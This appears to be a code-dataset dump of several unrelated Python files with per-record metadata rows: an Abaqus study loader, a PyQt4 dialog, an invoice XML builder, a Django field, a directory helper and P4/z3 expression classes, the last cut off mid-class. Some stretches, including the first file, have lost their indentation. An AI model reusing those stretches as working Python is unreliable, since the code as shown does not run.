__main__.mdb.saveAs(pathName = std_name + '.cae')
print(r'The DESICOS study has been saved to "{0}.study".'.format(
os.path.join(std.tmp_dir, std_name)))
print(' ')
def load_study(std_name):
std = study.Study()
std.tmp_dir = TMP_DIR
std.name = std_name
std = std.load()
std_name = find_std_name(std_name)
__main__.stds[std_name] = std
__main__.openMdb(pathName = std_name + '.cae')
vpname = __main__.session.currentViewportName
__main__.session.viewports[vpname].setValues(displayedObject = None)
mdb = __main__.mdb
if std.ccs[0].model_name in mdb.models.keys():
mod = mdb.models[std.ccs[0].model_name]
p = mod.parts['Shell']
__main__.session.viewports[vpname].setValues(displayedObject = p)
a = mod.rootAssembly
a.regenerate()
for cc in std.ccs:
if not cc.model_name in mdb.models.keys():
print('Could not load objects for model {0}!'.format(
cc.model_name))
continue
abaqus_functions.set_colors_ti(cc)
def get_new_key(which, key, value):
# Given a DB key and value
# Check whether value is already in the DB, if not add it
# and return a key that can be used to reference to 'value'
value = tuple(value) # Convert list to tuple, if needed
existing = fetch(which)
# Inverse mapping. Sorting keeps result reliable if there are duplicated values.
inv_existing = dict((v, k) for k, v in sorted(existing.iteritems(), reverse=True))
if key in existing and existing[key] == value:
# Key already exists and with the correct value, reuse it
return key
if value in inv_existing:
# There is already a name for this value in the DB, use it
return str(inv_existing[value])
# Find a new (not yet used) name and save in the DB
new_key = key
i = 1
while new_key in existing:
new_key = '{0}_{1:04d}'.format(key, i)
i += 1
save(which, new_key, value)
return new_key
def reconstruct_params_from_gui(std):
# First cc is often a linear one, so use the last cc as 'template'
# XX - it is assumed that all other ccs use the same parameters
cc = std.ccs[-1]
params = {}
for attr in ccattrs:
if attr in ('laminapropKeys', 'allowables', 'stack', 'plyts',
'damping_factor1', 'damping_factor2'):
continue
value = getattr(cc, attr)
params[attr] = value
# Set artificial_dampingX and damping_factorX manually
damping_attrs = [('damping_factor1', 'artificial_damping1'),
('damping_factor2', 'artificial_damping2')]
for damp_attr, art_attr in damping_attrs:
value = getattr(cc, damp_attr)
params[damp_attr] = value if (value is not None) else 0.
params[art_attr] = value is not None
# Prevent the GUI from complaining about unset parameters
for attr in ('axial_load', 'axial_displ', 'pressure_load'):
if params[attr] is None:
params[attr] = 0
# Set laminate properties
if not (len(cc.laminaprops) == len(cc.stack) == len(cc.plyts) ==
len(cc.laminapropKeys)):
raise ValueError('Loaded ConeCyl object has inconsistent stack length!')
laminapropKeys = []
for key, value in zip(cc.laminapropKeys, cc.laminaprops):
laminapropKeys.append(get_new_key('laminaprops', key, value))
params['laminapropKey'] = laminapropKeys[0]
# allowableKey is not saved, so reuse laminapropKey for the name
# TODO: Per-ply allowables
params['allowablesKey'] = get_new_key('allowables',
cc.laminapropKeys[0], cc.allowables[0])
# Construct laminate table
# import here to avoid circular reference
from testDB import NUM_PLIES, MAX_MODELS
tmp = np.empty((NUM_PLIES, 3), dtype='|S50')
tmp.fill('')
tmp[:len(laminapropKeys),0] = laminapropKeys
tmp[:len(cc.plyts),1] = cc.plyts
tmp[:len(cc.stack),2] = cc.stack
params['laminate'] = ','.join(['('+','.join(i)+')' for i in tmp])
# Apply perturbation loads
# TODO: other imperfections
all_ploads = list(chain.from_iterable(cci.impconf.ploads for cci in std.ccs))
all_ploads = map(lambda pl: (pl.thetadeg, pl.pt), all_ploads)
# Filter duplicates, to obtain a list of unique pload parameter combinations
seen = set()
all_ploads = [x for x in all_ploads if not (x in seen or seen.add(x))]
params['pl_num'] = len(all_ploads)
nonlinear_ccs = filter(lambda cci: not cci.linear_buckling, std.ccs)
# TODO: unduplicate magic numbers (here, in create_study and in testDB)
# It'll only get worse when adding other imperfections as well
if params['pl_num'] > 32:
raise ValueError('Too many different perturbation load parameters')
if len(nonlinear_ccs) > MAX_MODELS:
raise ValueError('Too many different models')
tmp = np.empty((len(nonlinear_ccs) + 3, 32), dtype='|S50')
tmp.fill('')
tmp[0,:len(all_ploads)] = [thetadeg for thetadeg, pt in all_ploads]
tmp[1,:len(all_ploads)] = [pt for thetadeg, pt in all_ploads]
for row, cci in enumerate(nonlinear_ccs, start=3):
for pl in cci.impconf.ploads:
assert (pl.thetadeg, pl.pt) in all_ploads
tmp[row,all_ploads.index((pl.thetadeg, pl.pt))] = pl.pltotal
params['pl_table'] = ','.join(['('+','.join(i)+')' for i in tmp])
# Apply PPI
ppi = cc.impconf.ppi
if ppi is not None:
params['ppi_enabled'] = True
params['ppi_extra_height'] = ppi.extra_height
tmp = np.empty((len(ppi.info), 4), dtype='|S50')
keys = ['starting_position', 'rel_ang_offset', 'max_width', 'eccentricity']
for i, info_dict in enumerate(ppi.info):
tmp[i,:] = [str(info_dict.get(key, '')) for key in keys]
params['ppi_table'] = ','.join(['('+','.join(i)+')' for i in tmp])
else:
params['ppi_table'] = ''
# Apply FFI
ffi = cc.impconf.ffi
if ffi is not None:
params['ffi_nominal_vf'] = ffi.nominal_vf
params['ffi_E_matrix'] = ffi.E_matrix
params['ffi_nu_matrix'] = ffi.nu_matrix
ffi_scalings = []
for cci in nonlinear_ccs:
ffi = cci.impconf.ffi
if ffi is None:
ffi_scalings.append((0, False))
else:
sf = ffi.global_sf if ffi.global_sf is not None else 0
ffi_scalings.append((sf, ffi.use_ti))
params['ffi_scalings'] = ','.join(str(s) for s in ffi_scalings)
else:
params['ffi_scalings'] = ''
# MSI, TI
for imp_type in ('ms', 't'):
imps = getattr(cc.impconf, imp_type + 'is')
if len(imps) == 0:
params['imp_{0}_scalings'.format(imp_type)] = ''
continue
imp = imps[0]
params['imp_{0}_theta_z_format'.format(imp_type)] = imp.use_theta_z_format
params['imp_{0}_stretch_H'.format(imp_type)] = imp.stretch_H
params['imp_{0}_ncp'.format(imp_type)] = imp.ncp
params['imp_{0}_power_parameter'.format(imp_type)] = imp.power_parameter
# rotatedeg seems not yet implemented in GUI ?!
# params['imp_{0}_rotatedeg'.format(imp_type)] = imp.rotatedeg
name_attr = 'imp_ms' if imp_type == 'ms' else 'imp_thick'
params[name_attr] = getattr(imp, name_attr)
if imp_type == 'ms':
params['imp_r_TOL'] = imp.r_TOL
else:
params['imp_num_sets'] = imp.number_of_sets
# If there are multiple TIs / MSIs, we are out of luck
scalings = []
for cci in nonlinear_ccs:
cci_imps = getattr(cci.impconf, imp_type + 'is')
def filter_imps(impi):
return getattr(impi, name_attr) == getattr(imp, name_attr)
cci_imps = filter(filter_imps, cci_imps)
scalings.append(0 if len(cci_imps) == 0 else cci_imps[0].scaling_factor)
scalings = ','.join(str(s) for s in scalings)
params['imp_{0}_scalings'.format(imp_type)] = scalings
params['std_name'] = std.name
std.params_from_gui = params
def load_study_gui(std_name, form):
std = study.Study()
std.tmp_dir = TMP_DIR
std.name = std_name
std = std.load()
saved_from_gui = len(std.params_from_gui) != 0
if not saved_from_gui:
reconstruct_params_from_gui(std)
form.setDefault()
form.read_params_from_gui(std.params_from_gui)
return saved_from_gui
| 36.96796 | 125 | 0.593194 | 0 | 0 | 0 | 0 | 2,397 | 0.109342 | 0 | 0 | 4,981 | 0.227215 |
d3230aebfb6ec10341841fb4d94700228d875338 | 2,277 | py | Python | pydeelib/widgets/texteditor.py | pombreda/pydee | 133609d4e378361d968e7a06baa11256e0e2f403 | [
"MIT"
] | null | null | null | pydeelib/widgets/texteditor.py | pombreda/pydee | 133609d4e378361d968e7a06baa11256e0e2f403 | [
"MIT"
] | null | null | null | pydeelib/widgets/texteditor.py | pombreda/pydee | 133609d4e378361d968e7a06baa11256e0e2f403 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright © 2009 Pierre Raybaut
# Licensed under the terms of the MIT License
# (see pydeelib/__init__.py for details)
"""
Text Editor Dialog based on PyQt4
"""
# pylint: disable-msg=C0103
# pylint: disable-msg=R0903
# pylint: disable-msg=R0911
# pylint: disable-msg=R0201
from PyQt4.QtCore import Qt
from PyQt4.QtCore import SIGNAL, SLOT
from PyQt4.QtGui import QVBoxLayout, QTextEdit, QDialog, QDialogButtonBox
# Local import
from pydeelib.config import get_icon, get_font
class TextEditor(QDialog):
"""Array Editor Dialog"""
def __init__(self, text, title='', font=None, parent=None):
super(TextEditor, self).__init__(parent)
self.layout = QVBoxLayout()
self.setLayout(self.layout)
# Text edit
self.edit = QTextEdit(parent)
self.edit.setPlainText(text)
if font is None:
font = get_font('texteditor')
self.edit.setFont(font)
self.layout.addWidget(self.edit)
# Buttons configuration
bbox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel )
self.connect(bbox, SIGNAL("accepted()"), SLOT("accept()"))
self.connect(bbox, SIGNAL("rejected()"), SLOT("reject()"))
self.layout.addWidget(bbox)
# Make the dialog act as a window
self.setWindowFlags(Qt.Window)
self.setWindowIcon(get_icon('edit.png'))
self.setWindowTitle(self.tr("Text editor") + \
"%s" % (" - "+str(title) if str(title) else ""))
self.resize(400, 300)
def get_copy(self):
"""Return modified text"""
return unicode(self.edit.toPlainText())
def main():
"""Text editor demo"""
from PyQt4.QtGui import QApplication
QApplication([])
dialog = TextEditor("""
01234567890123456789012345678901234567890123456789012345678901234567890123456789
dedekdh elkd ezd ekjd lekdj elkdfjelfjk e
""")
if dialog.exec_():
text = dialog.get_copy()
print "Accepted:", text
dialog = TextEditor(text)
dialog.exec_()
else:
print "Canceled"
if __name__ == "__main__":
main() | 29.960526 | 85 | 0.611331 | 1,227 | 0.53863 | 0 | 0 | 0 | 0 | 0 | 0 | 729 | 0.320018 |
d32563b73d3b9a87be6655f27c6f26fcf020fa7f | 5,553 | py | Python | invoices/xml/__init__.py | pythonitalia/fatturae | 29e680ca942f60fcd92cff8e9651ee89bf832732 | [
"MIT"
] | 11 | 2018-12-28T12:13:21.000Z | 2021-01-19T15:33:47.000Z | invoices/xml/__init__.py | pythonitalia/fatturae | 29e680ca942f60fcd92cff8e9651ee89bf832732 | [
"MIT"
] | 8 | 2019-07-03T21:07:18.000Z | 2021-12-13T19:59:13.000Z | invoices/xml/__init__.py | pythonitalia/fatturae | 29e680ca942f60fcd92cff8e9651ee89bf832732 | [
"MIT"
] | 6 | 2019-01-01T23:56:41.000Z | 2021-09-21T06:54:53.000Z | from __future__ import annotations
from typing import TYPE_CHECKING, List
from lxml import etree
from .types import ProductSummary, XMLDict
from .utils import dict_to_xml, format_price
if TYPE_CHECKING:
from invoices.models import Invoice, Sender, Address
NAMESPACE_MAP = {
"p": "http://ivaservizi.agenziaentrate.gov.it/docs/xsd/fatture/v1.2",
"ds": "http://www.w3.org/2000/09/xmldsig#",
"xsi": "http://www.w3.org/2001/XMLSchema-instance",
}
SCHEMA_LOCATION = (
"http://ivaservizi.agenziaentrate.gov.it/docs/xsd/fatture/v1.2 "
"http://www.fatturapa.gov.it/export/fatturazione/sdi/fatturapa/v1.2"
"/Schema_del_file_xml_FatturaPA_versione_1.2.xsd"
)
def _get_recipient_code(invoice: Invoice) -> str:
if not invoice.recipient_code:
return "0000000"
return invoice.recipient_code
def _generate_header(invoice: Invoice) -> XMLDict:
sender: Sender = invoice.sender
address: Address = sender.address
client_address: Address = invoice.recipient_address
header: XMLDict = {
"FatturaElettronicaHeader": {
"DatiTrasmissione": {
"IdTrasmittente": {
"IdPaese": sender.country_code,
"IdCodice": sender.code,
},
"ProgressivoInvio": 1,
"FormatoTrasmissione": invoice.transmission_format,
"CodiceDestinatario": _get_recipient_code(invoice),
"PecDestinatario": invoice.recipient_pec,
},
"CedentePrestatore": {
"DatiAnagrafici": {
"IdFiscaleIVA": {
"IdPaese": sender.country_code,
"IdCodice": sender.code,
},
"Anagrafica": {"Denominazione": sender.company_name},
"RegimeFiscale": sender.tax_regime,
},
"Sede": {
"Indirizzo": address.address,
"CAP": address.postcode,
"Comune": address.city,
"Provincia": address.province,
"Nazione": address.country_code,
},
},
"CessionarioCommittente": {
"DatiAnagrafici": {
# TODO: add fiscal code if no recipient_tax_code
"IdFiscaleIVA": {
"IdPaese": sender.country_code,
"IdCodice": invoice.recipient_tax_code,
},
"Anagrafica": {
"Denominazione": invoice.recipient_denomination,
"Nome": invoice.recipient_first_name,
"Cognome": invoice.recipient_last_name,
},
},
"Sede": {
"Indirizzo": client_address.address,
"CAP": client_address.postcode,
"Comune": client_address.city,
"Provincia": client_address.province,
"Nazione": client_address.country_code,
},
},
}
}
return header
def _generate_body(invoice: Invoice) -> XMLDict:
summary: List[ProductSummary] = invoice.invoice_summary
body: XMLDict = {
"FatturaElettronicaBody": {
"DatiGenerali": {
"DatiGeneraliDocumento": {
"TipoDocumento": invoice.invoice_type,
"Divisa": invoice.invoice_currency,
"Data": invoice.invoice_date.strftime("%Y-%m-%d"),
"Numero": invoice.invoice_number,
"Causale": invoice.causal,
}
},
"DatiBeniServizi": {
"DettaglioLinee": [
{
"NumeroLinea": x["row"],
"Descrizione": x["description"],
"Quantita": format_price(x["quantity"]),
"PrezzoUnitario": format_price(x["unit_price"]),
"PrezzoTotale": format_price(x["total_price"]),
"AliquotaIVA": format_price(x["vat_rate"]),
}
for x in summary
],
"DatiRiepilogo": {
"AliquotaIVA": format_price(invoice.invoice_tax_rate),
"ImponibileImporto": format_price(invoice.invoice_amount),
"Imposta": format_price(
invoice.invoice_tax_rate * invoice.invoice_amount / 100
),
},
},
"DatiPagamento": {
"CondizioniPagamento": invoice.payment_condition,
"DettaglioPagamento": {
"ModalitaPagamento": invoice.payment_method,
"ImportoPagamento": format_price(invoice.invoice_amount),
},
},
}
}
return body
def invoice_to_xml(invoice: Invoice) -> etree._Element:
root_tag = "{%s}FatturaElettronica" % NAMESPACE_MAP["p"]
schema_location_key = "{%s}schemaLocation" % NAMESPACE_MAP["xsi"]
root = etree.Element(
root_tag,
attrib={schema_location_key: SCHEMA_LOCATION},
nsmap=NAMESPACE_MAP,
versione="FPR12",
)
header = _generate_header(invoice)
body = _generate_body(invoice)
tags = [*dict_to_xml(header), *dict_to_xml(body)]
for tag in tags:
root.append(tag)
return root
| 34.277778 | 79 | 0.52134 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,372 | 0.247074 |
d3256dbf7b293bf8be691bd30c05059ca559be89 | 685 | py | Python | src/sentry/db/models/fields/foreignkey.py | withrocks/commonlims | d8a925c917aa26e8205fefb3966a9f49f8f2e2f8 | [
"BSD-3-Clause"
] | 4 | 2019-05-27T13:55:07.000Z | 2021-03-30T07:05:09.000Z | src/sentry/db/models/fields/foreignkey.py | withrocks/commonlims | d8a925c917aa26e8205fefb3966a9f49f8f2e2f8 | [
"BSD-3-Clause"
] | 99 | 2019-05-20T14:16:33.000Z | 2021-01-19T09:25:15.000Z | src/sentry/db/models/fields/foreignkey.py | withrocks/commonlims | d8a925c917aa26e8205fefb3966a9f49f8f2e2f8 | [
"BSD-3-Clause"
] | 1 | 2020-08-10T07:55:40.000Z | 2020-08-10T07:55:40.000Z | """
sentry.db.models.fields.foreignkey
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
from django.db.models import ForeignKey
__all__ = ('FlexibleForeignKey', )
class FlexibleForeignKey(ForeignKey):
def db_type(self, connection):
# This is required to support BigAutoField (or anything similar)
rel_field = self.target_field
if hasattr(rel_field, 'get_related_db_type'):
return rel_field.get_related_db_type(connection)
return super(FlexibleForeignKey, self).db_type(connection)
| 29.782609 | 75 | 0.70073 | 365 | 0.532847 | 0 | 0 | 0 | 0 | 0 | 0 | 304 | 0.443796 |
d32a4aebc5975eb5e4c7cdb76bcd29f0483434fb | 3,235 | py | Python | pybond/bond/bond_helpers/observe_files.py | necula01/bond | 7ac262bc9695ba493985c784999509dec979e37a | [
"BSD-2-Clause-FreeBSD"
] | 8 | 2015-11-19T01:14:08.000Z | 2017-06-16T11:21:16.000Z | pybond/bond/bond_helpers/observe_files.py | gnecula/bond | 7ac262bc9695ba493985c784999509dec979e37a | [
"BSD-2-Clause-FreeBSD"
] | 26 | 2015-10-12T21:31:13.000Z | 2017-04-11T13:57:33.000Z | pybond/bond/bond_helpers/observe_files.py | gnecula/bond | 7ac262bc9695ba493985c784999509dec979e37a | [
"BSD-2-Clause-FreeBSD"
] | 3 | 2015-10-30T01:12:10.000Z | 2016-03-26T16:58:17.000Z | # Helper functions to observe files and directories
import os
import re
def collect_directory_contents(directory,
file_filter=None,
collect_file_contents=False):
"""
Collect an object reflecting the contents of a directory
:param directory: the directory where to start the traversal
:param file_filter: either a string representing a regular expression on the name of the files
and directories to be included, or a function that given the directory and the filename
returns true or false, whether the directory or file should be included.
:param collect_file_contents: indicates whether to collect the contents of files.
True means to include contents of all files,
:return: a dictionary with keys corresponding to basename of files and subdirectories.
Only files that are allowed by the file_filter are included.
If the file contents is collected then the dictionary contains a list of lines.
"""
# TODO: figure out a more general form for this, perhaps using
# a configurable visitor to define how to visit each file
result = { } # map from file name to file data.
# file data is either None (if the contents is not spied),
# or an array of lines
# Prepare the file filter
file_filter_func = None
if file_filter:
if isinstance(file_filter, basestring):
file_filter_regexp = re.compile(file_filter)
file_filter_func = lambda rel_file: file_filter_regexp.match(rel_file)
else:
# TODO: assert that it is a function
file_filter_func = file_filter
collect_file_contents_func = None
if collect_file_contents:
if isinstance(collect_file_contents, bool):
if collect_file_contents:
collect_file_contents_func = lambda rel_file: True
elif isinstance(collect_file_contents, basestring):
include_file_contents_regexp = re.compile(collect_file_contents)
collect_file_contents_func = lambda rel_file: include_file_contents_regexp.match(rel_file)
else:
# TODO: assert that it is a function
collect_file_contents_func = collect_file_contents
def recurse(rel_subdir, result_data):
name_subdir = os.path.join(directory, rel_subdir)
for basename in os.listdir(name_subdir):
rel_file = os.path.join(rel_subdir, basename)
file = os.path.join(directory, rel_file)
if file_filter_func and not file_filter_func(rel_file):
continue
if os.path.isdir(file):
subresult_data = {}
result_data[basename] = subresult_data
recurse(rel_file, subresult_data)
else:
if collect_file_contents_func and collect_file_contents_func(rel_file):
with open(file, 'r') as f:
lines = f.readlines ()
result_data[basename] = [l.rstrip() for l in lines ]
else:
result_data[basename] = None
recurse('', result)
return result
| 44.930556 | 102 | 0.646677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,205 | 0.372488 |
d32aedc406d3ed96b03df496926ed0bbfe5758f8 | 18,611 | py | Python | p4z3/expressions.py | gauntlet-repo/gauntlet | be847507556fc61d85e0bfd70ac57b5d064c9e8a | [
"Apache-2.0"
] | 2 | 2020-08-16T02:23:19.000Z | 2021-01-04T16:01:35.000Z | p4z3/expressions.py | gauntlet-repo/gauntlet | be847507556fc61d85e0bfd70ac57b5d064c9e8a | [
"Apache-2.0"
] | null | null | null | p4z3/expressions.py | gauntlet-repo/gauntlet | be847507556fc61d85e0bfd70ac57b5d064c9e8a | [
"Apache-2.0"
] | null | null | null | import operator as op
from p4z3.base import log, z3_cast, z3, copy_attrs, copy, gen_instance
from p4z3.base import P4ComplexInstance, P4Expression, P4ComplexType
class P4Initializer(P4Expression):
def __init__(self, val, instance_type=None):
self.val = val
self.instance_type = instance_type
def eval(self, p4_state):
val = p4_state.resolve_expr(self.val)
if self.instance_type is None:
# no type defined, return just the value
return val
else:
instance = gen_instance("None", self.instance_type)
if isinstance(val, P4ComplexInstance):
# copy the reference if we initialize with another complex type
return copy.copy(val)
if isinstance(instance, P4ComplexInstance):
if isinstance(val, dict):
instance.setValid()
for name, val in val.items():
val_expr = p4_state.resolve_expr(val)
instance.set_or_add_var(name, val_expr)
elif isinstance(val, list):
instance.set_list(val)
else:
raise RuntimeError(
f"P4StructInitializer members {val} not supported!")
return instance
else:
# cast the value we assign to the instance we create
# TODO: I do not like this, there must be a better way to do this
if isinstance(val, int) and isinstance(instance, (z3.BitVecSortRef, z3.BitVecRef)):
val = z3_cast(val, instance.sort())
return val
class P4Op(P4Expression):
def get_value(self):
raise NotImplementedError("get_value")
def eval(self, p4_state):
raise NotImplementedError("eval")
class P4BinaryOp(P4Op):
def __init__(self, lval, rval, operator):
self.lval = lval
self.rval = rval
self.operator = operator
def get_value(self):
# TODO: This is a kind of hacky function to work around bitvectors
# There must be a better way to implement this
lval = self.lval
rval = self.rval
if isinstance(lval, P4Op):
lval = lval.get_value()
if isinstance(rval, P4Op):
rval = rval.get_value()
if isinstance(lval, int) and isinstance(rval, int):
return self.operator(lval, rval)
else:
raise RuntimeError(
f"Operations on {lval} or {rval} not supported!")
def eval(self, p4_state):
lval_expr = p4_state.resolve_expr(self.lval)
rval_expr = p4_state.resolve_expr(self.rval)
# align the bitvectors to allow operations
lval_is_bitvec = isinstance(lval_expr, (z3.BitVecRef, z3.BitVecNumRef))
rval_is_bitvec = isinstance(rval_expr, (z3.BitVecRef, z3.BitVecNumRef))
if lval_is_bitvec and rval_is_bitvec:
if lval_expr.size() < rval_expr.size():
rval_expr = z3_cast(rval_expr, lval_expr.size())
if lval_expr.size() > rval_expr.size():
lval_expr = z3_cast(lval_expr, rval_expr.size())
return self.operator(lval_expr, rval_expr)
class P4UnaryOp(P4Op):
def __init__(self, val, operator):
self.val = val
self.operator = operator
def get_value(self):
val = self.val
if isinstance(val, P4Op):
val = val.get_value()
if isinstance(val, int):
return self.operator(val)
else:
raise RuntimeError(f"Operations on {val}not supported!")
def eval(self, p4_state):
expr = p4_state.resolve_expr(self.val)
return self.operator(expr)
class P4not(P4UnaryOp):
def __init__(self, val):
operator = z3.Not
P4UnaryOp.__init__(self, val, operator)
class P4abs(P4UnaryOp):
def __init__(self, val):
operator = op.abs
P4UnaryOp.__init__(self, val, operator)
class P4inv(P4UnaryOp):
def __init__(self, val):
operator = op.inv
P4UnaryOp.__init__(self, val, operator)
class P4neg(P4UnaryOp):
def __init__(self, val):
operator = op.neg
P4UnaryOp.__init__(self, val, operator)
class P4add(P4BinaryOp):
def __init__(self, lval, rval):
operator = op.add
P4BinaryOp.__init__(self, lval, rval, operator)
class P4sub(P4BinaryOp):
def __init__(self, lval, rval):
def operator(x, y):
# for some reason, z3 borks if you use an int as x?
if isinstance(x, int) and isinstance(y, z3.BitVecRef):
x = z3_cast(x, y)
return op.sub(x, y)
P4BinaryOp.__init__(self, lval, rval, operator)
class P4addsat(P4BinaryOp):
def __init__(self, lval, rval):
def operator(x, y):
no_overflow = z3.BVAddNoOverflow(x, y, False)
no_underflow = z3.BVAddNoUnderflow(x, y)
max_return = 2**x.size() - 1
return z3.If(z3.And(no_overflow, no_underflow), x + y, max_return)
P4BinaryOp.__init__(self, lval, rval, operator)
class P4subsat(P4BinaryOp):
def __init__(self, lval, rval):
def operator(x, y):
no_overflow = z3.BVSubNoOverflow(x, y)
no_underflow = z3.BVSubNoUnderflow(x, y, False)
zero_return = 0
return z3.If(z3.And(no_overflow, no_underflow), x - y, zero_return)
P4BinaryOp.__init__(self, lval, rval, operator)
class P4mul(P4BinaryOp):
def __init__(self, lval, rval):
operator = op.mul
P4BinaryOp.__init__(self, lval, rval, operator)
class P4mod(P4BinaryOp):
def __init__(self, lval, rval):
# P4 only supports positive unsigned modulo operations
def operator(x, y):
# z3 requires at least one value to be a bitvector for SRem
# use normal modulo ops instead
if isinstance(y, int) and isinstance(x, int):
return op.mod(x, y)
return z3.URem(x, y)
P4BinaryOp.__init__(self, lval, rval, operator)
class P4pow(P4BinaryOp):
def __init__(self, lval, rval):
operator = op.pow
P4BinaryOp.__init__(self, lval, rval, operator)
class P4band(P4BinaryOp):
def __init__(self, lval, rval):
def operator(x, y):
# this extra check is necessary because of z3...
if z3.is_int(x) and isinstance(y, z3.BitVecRef):
x = z3_cast(x, y)
if z3.is_int(y) and isinstance(x, z3.BitVecRef):
y = z3_cast(y, x)
return op.and_(x, y)
P4BinaryOp.__init__(self, lval, rval, operator)
class P4bor(P4BinaryOp):
def __init__(self, lval, rval):
def operator(x, y):
# this extra check is necessary because of z3...
if z3.is_int(x) and isinstance(y, z3.BitVecRef):
x = z3_cast(x, y)
if z3.is_int(y) and isinstance(x, z3.BitVecRef):
y = z3_cast(y, x)
return op.or_(x, y)
P4BinaryOp.__init__(self, lval, rval, operator)
class P4land(P4BinaryOp):
def __init__(self, lval, rval):
operator = z3.And
P4BinaryOp.__init__(self, lval, rval, operator)
def eval(self, p4_state):
# boolean expressions can short-circuit
# so we save the result of the right-hand expression and merge
lval_expr = p4_state.resolve_expr(self.lval)
var_store, chain_copy = p4_state.checkpoint()
rval_expr = p4_state.resolve_expr(self.rval)
else_vars = copy_attrs(p4_state.locals)
p4_state.restore(var_store, chain_copy)
p4_state.merge_attrs(lval_expr, else_vars)
return self.operator(lval_expr, rval_expr)
class P4lor(P4BinaryOp):
def __init__(self, lval, rval):
operator = z3.Or
P4BinaryOp.__init__(self, lval, rval, operator)
def eval(self, p4_state):
# boolean expressions can short-circuit
# so we save the result of the right-hand expression and merge
lval_expr = p4_state.resolve_expr(self.lval)
var_store, chain_copy = p4_state.checkpoint()
rval_expr = p4_state.resolve_expr(self.rval)
else_vars = copy_attrs(p4_state.locals)
p4_state.restore(var_store, chain_copy)
p4_state.merge_attrs(z3.Not(lval_expr), else_vars)
return self.operator(lval_expr, rval_expr)
class P4xor(P4BinaryOp):
def __init__(self, lval, rval):
operator = op.xor
P4BinaryOp.__init__(self, lval, rval, operator)
class P4div(P4BinaryOp):
def __init__(self, lval, rval):
def operator(x, y):
# z3 requires at least one value to be a bitvector for UDiv
if isinstance(y, int) and isinstance(x, int):
x = x.as_bitvec
y = y.as_bitvec
return op.truediv(x, y)
return z3.UDiv(x, y)
P4BinaryOp.__init__(self, lval, rval, operator)
class P4lshift(P4BinaryOp):
def __init__(self, lval, rval):
P4BinaryOp.__init__(self, lval, rval, None)
def eval(self, p4_state):
# z3 does not like to shift operators of different size
# but casting both values could lead to missing an overflow
# so after the operation cast the lvalue down to its original size
lval_expr = p4_state.resolve_expr(self.lval)
rval_expr = p4_state.resolve_expr(self.rval)
if isinstance(lval_expr, int):
# if lval_expr is an int we might get a signed value
# the only size adjustment is to make the rval expr large enough
# for some reason a small rval leads to erroneous shifts...
return op.lshift(lval_expr, z3_cast(rval_expr, 32))
# align the bitvectors to allow operations
lval_is_bitvec = isinstance(lval_expr, z3.BitVecRef)
rval_is_bitvec = isinstance(rval_expr, z3.BitVecRef)
orig_lval_size = lval_expr.size()
if lval_is_bitvec and rval_is_bitvec:
if lval_expr.size() < rval_expr.size():
lval_expr = z3_cast(lval_expr, rval_expr.size())
if lval_expr.size() > rval_expr.size():
rval_expr = z3_cast(rval_expr, lval_expr.size())
return z3_cast(op.lshift(lval_expr, rval_expr), orig_lval_size)
class P4rshift(P4BinaryOp):
def __init__(self, lval, rval):
P4BinaryOp.__init__(self, lval, rval, None)
def eval(self, p4_state):
# z3 does not like to shift operators of different size
# but casting both values could lead to missing an overflow
# so after the operation cast the lvalue down to its original size
lval_expr = p4_state.resolve_expr(self.lval)
rval_expr = p4_state.resolve_expr(self.rval)
if isinstance(lval_expr, int):
# if x is an int we might get a signed value
# we need to use the arithmetic right shift in this case
return op.rshift(lval_expr, rval_expr)
# align the bitvectors to allow operations
lval_is_bitvec = isinstance(lval_expr, z3.BitVecRef)
rval_is_bitvec = isinstance(rval_expr, z3.BitVecRef)
orig_lval_size = lval_expr.size()
if lval_is_bitvec and rval_is_bitvec:
if lval_expr.size() < rval_expr.size():
lval_expr = z3_cast(lval_expr, rval_expr.size())
if lval_expr.size() > rval_expr.size():
rval_expr = z3_cast(rval_expr, lval_expr.size())
return z3_cast(z3.LShR(lval_expr, rval_expr), orig_lval_size)
class P4eq(P4BinaryOp):
def __init__(self, lval, rval):
operator = op.eq
P4BinaryOp.__init__(self, lval, rval, operator)
class P4ne(P4BinaryOp):
def __init__(self, lval, rval):
# op.ne does not work quite right, this is the z3 way to do it
def operator(x, y):
return z3.Not(op.eq(x, y))
P4BinaryOp.__init__(self, lval, rval, operator)
class P4lt(P4BinaryOp):
def __init__(self, lval, rval):
def operator(x, y):
# if x and y are ints we might deal with a signed value
# we need to use the normal operator in this case
if isinstance(x, int) and isinstance(y, int):
return op.lt(x, y)
return z3.ULT(x, y)
P4BinaryOp.__init__(self, lval, rval, operator)
class P4le(P4BinaryOp):
def __init__(self, lval, rval):
def operator(x, y):
# if x and y are ints we might deal with a signed value
# we need to use the normal operator in this case
if isinstance(x, int) and isinstance(y, int):
return op.le(x, y)
return z3.ULE(x, y)
P4BinaryOp.__init__(self, lval, rval, operator)
class P4ge(P4BinaryOp):
def __init__(self, lval, rval):
def operator(x, y):
# if x and y are ints we might deal with a signed value
# we need to use the normal operator in this case
if isinstance(x, int) and isinstance(y, int):
return op.ge(x, y)
return z3.UGE(x, y)
P4BinaryOp.__init__(self, lval, rval, operator)
class P4gt(P4BinaryOp):
def __init__(self, lval, rval):
def operator(x, y):
# if x and y are ints we might deal with a signed value
# we need to use the normal operator in this case
if isinstance(x, int) and isinstance(y, int):
return op.gt(x, y)
# FIXME: Find a better way to model negative comparions
# right now we have this hack
if isinstance(x, int) and x < 0:
return z3.BoolVal(False)
if isinstance(y, int) and y < 0:
return z3.BoolVal(True)
return z3.UGT(x, y)
P4BinaryOp.__init__(self, lval, rval, operator)
class P4Mask(P4BinaryOp):
# TODO: Check if this mask operator is right
def __init__(self, lval, rval):
operator = op.and_
P4BinaryOp.__init__(self, lval, rval, operator)
class P4Concat(P4Expression):
def __init__(self, lval, rval):
self.lval = lval
self.rval = rval
def eval(self, p4_state):
# for concat we do not align the size of the operators
lval = p4_state.resolve_expr(self.lval)
rval = p4_state.resolve_expr(self.rval)
# all values must be bitvectors... so cast them
# this is necessary because int<*> values can be concatenated
if isinstance(lval, int):
lval = lval.as_bitvec
if isinstance(rval, int):
rval = rval.as_bitvec
return z3.Concat(lval, rval)
class P4Cast(P4BinaryOp):
